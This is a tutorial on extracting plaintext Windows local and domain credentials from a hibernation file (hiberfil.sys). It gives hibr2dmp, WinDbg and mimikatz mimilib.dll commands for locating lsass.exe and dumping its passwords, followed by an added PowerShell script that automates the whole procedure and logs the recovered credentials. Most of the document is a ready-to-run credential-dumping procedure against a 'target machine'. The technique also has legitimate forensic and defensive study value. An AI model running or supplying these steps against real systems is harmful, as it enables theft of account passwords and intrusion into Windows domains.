Recovering local and domain passwords from hiberfil.sys

The mimikatz utility, which extracts Windows credentials from LSA in plaintext, has been around since 2012. Besides its well-known ability to recover passwords from the memory of a running OS, it has another rather interesting feature: its WinDbg extension, mimilib.dll, can do the same against a memory image. Below are step-by-step instructions for extracting credentials from the hiberfil.sys file, the hibernation file in which Windows stores the contents of RAM.

Preparation


To implement our plan, we will need the following utilities (each is used in the steps below):

hibr2dmp.exe (converts hiberfil.sys into a crash dump)
WinDbg (Debugging Tools for Windows), plus access to the Microsoft symbol server
mimikatz, specifically its WinDbg extension mimilib.dll

Actions


1. Get the hiberfil.sys file from the target machine. It lives in the root of the system drive (C:\hiberfil.sys, a hidden system file) and is locked while Windows is running, so it is normally taken from an offline disk or a forensic disk image. It holds the contents of RAM as of the last hibernation and does not exist at all if hibernation is disabled (powercfg /h off).

2. Convert the file to a format that WinDbg understands (a crash dump).

hibr2dmp.exe d:\temp\hiberfil.sys c:\temp\hiberfil.dmp

The process can take quite a while.


3. Run WinDbg and open the resulting file.

File -> Open Crash Dump

4. Configure debugging symbols.

Open File -> Symbol File Path ... and enter the following line:

SRV*c:\symbols*http://msdl.microsoft.com/download/symbols


Instead of c:\symbols there can, of course, be any directory into which the symbols will be downloaded.

At the debugger command line, enter:

0: kd> .reload /n

Wait for the symbols to finish loading.


5. Specify the path to the mimilib.dll library (located in the directory with mimikatz).

0: kd> .load z:\Soft\Security\Passwords\Mimikatz\x64\mimilib.dll


6. Find the address of the lsass.exe process.

0: kd> !process 0 0 lsass.exe

The EPROCESS address is printed on the "PROCESS ..." line of the output. In this case, the address is fffffa800a7d9060.

7. Switch to the context of that process (/p means the argument is an EPROCESS address, /r reloads user-mode symbols after the switch).

0: kd> .process /r /p fffffa800a7d9060


8. Run mimikatz and get the passwords in clear text.

0: kd> !mimikatz

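The same procedure can be driven from a script instead of the WinDbg GUI by using cdb.exe, the console debugger that ships with WinDbg and accepts the same commands. The PowerShell below is an added example, not code from the original article or from the mimikatz project; the tool locations, the dump path and the log file name are assumptions. It runs hibr2dmp (step 2), opens the dump with the symbol path (steps 3-4), locates lsass.exe by parsing the "PROCESS <address>" line (step 6), and then starts a second debugger session that loads mimilib.dll, switches into the process and runs !mimikatz (steps 5, 7, 8):

```powershell
# Added example: automate steps 2-8 of the procedure above with cdb.exe.
# Not code from the original article or from mimikatz. All paths are assumptions.
$Hiberfil = 'D:\temp\hiberfil.sys'                 # assumed: copy of the target's hiberfil.sys
$Dump     = 'C:\temp\hiberfil.dmp'                 # crash dump produced by hibr2dmp
$Hibr2Dmp = 'C:\Tools\hibr2dmp.exe'                # assumed tool location
$Cdb      = 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe'  # assumed SDK path
$MimiLib  = 'C:\Tools\mimikatz\x64\mimilib.dll'    # assumed mimikatz location (no spaces in path)
$SymPath  = 'SRV*C:\symbols*http://msdl.microsoft.com/download/symbols'
$LogFile  = 'C:\temp\mimikatz-hiberfil.log'        # assumed output file

function Invoke-Cdb {
    # Opens the crash dump (-z) with the symbol path (-y), runs the given
    # semicolon-separated debugger commands (-c) and returns all console output.
    param([string]$Commands)
    & $Cdb -z $Dump -y $SymPath -c $Commands 2>&1 | Out-String
}

# Step 2: hiberfil.sys -> crash dump. Slow; skipped if the dump already exists.
if (-not (Test-Path $Dump)) {
    & $Hibr2Dmp $Hiberfil $Dump
    if ($LASTEXITCODE -ne 0) { throw "hibr2dmp failed with exit code $LASTEXITCODE" }
}

# Steps 3-6: load kernel symbols, list lsass.exe, quit. !process prints a
# "PROCESS <EPROCESS address>" line for every matching process.
$listing = Invoke-Cdb '.reload /n; !process 0 0 lsass.exe; q'
$m = [regex]::Match($listing, 'PROCESS\s+([0-9a-fA-F]{8,16})')
if (-not $m.Success) { throw "lsass.exe not found in $Dump. Debugger output:`n$listing" }
$lsass = $m.Groups[1].Value
Write-Host "lsass.exe EPROCESS: $lsass"

# Steps 5, 7, 8: second session: load mimilib, switch into lsass, run !mimikatz.
$out = Invoke-Cdb ".reload /n; .load $MimiLib; .process /r /p $lsass; !mimikatz; q"
$out | Set-Content -Path $LogFile
$out
```

Two sessions are used because cdb has no convenient way to capture the EPROCESS address into a variable in the same run; the first run only needs kernel symbols, which are then cached under C:\symbols for the second. The output of !mimikatz is both echoed and written to the log file.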

Related Links


Credential Disclosure in Microsoft Windows: http://www.securitylab.ru/vulnerability/420418.php
LSA Authentication: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378326(v=vs.85).aspx
What is Digest Authentication: https://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx
